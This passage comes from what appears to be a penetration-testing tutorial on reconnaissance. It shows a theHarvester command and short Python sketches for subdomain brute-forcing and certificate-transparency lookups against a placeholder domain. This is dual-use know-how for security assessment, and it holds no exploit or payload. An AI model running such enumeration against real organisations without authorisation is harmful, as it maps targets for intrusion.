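python theHarvester.py -d example.com -b google -l 500 -f report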

IV. External information scanning

1. Subdomain brute-forcing tools
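
A minimal sketch of what these tools do under the hood: resolve candidate names from a wordlist and keep the ones that answer. It uses dnspython (which the LinkedInt script above already depends on); the wordlist and domain are illustrative, and real tools use far larger lists and handle wildcard DNS:

import dns.resolver

domain = 'example.com'  # placeholder target
words = ['www', 'mail', 'vpn', 'oa', 'crm', 'git', 'dev', 'test']

for w in words:
    name = '{}.{}'.format(w, domain)
    try:
        for rdata in dns.resolver.query(name, 'A'):
            print('{} -> {}'.format(name, rdata.address))
    except Exception:
        pass  # NXDOMAIN, timeout, etc.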

2. Online subdomain lookup services
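
Besides dedicated lookup sites, certificate-transparency logs are a handy passive source; crt.sh exposes a JSON endpoint (a minimal sketch; the response format is controlled by crt.sh and may change):

import json
import requests

domain = 'example.com'  # placeholder target
r = requests.get('https://crt.sh/?q=%25.{}&output=json'.format(domain))
names = set()
for entry in json.loads(r.text):
    names.update(entry['name_value'].split('\n'))  # one cert may cover several names
for n in sorted(names):
    print(n)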

Conclusion

Quite a few of these tools are very powerful.
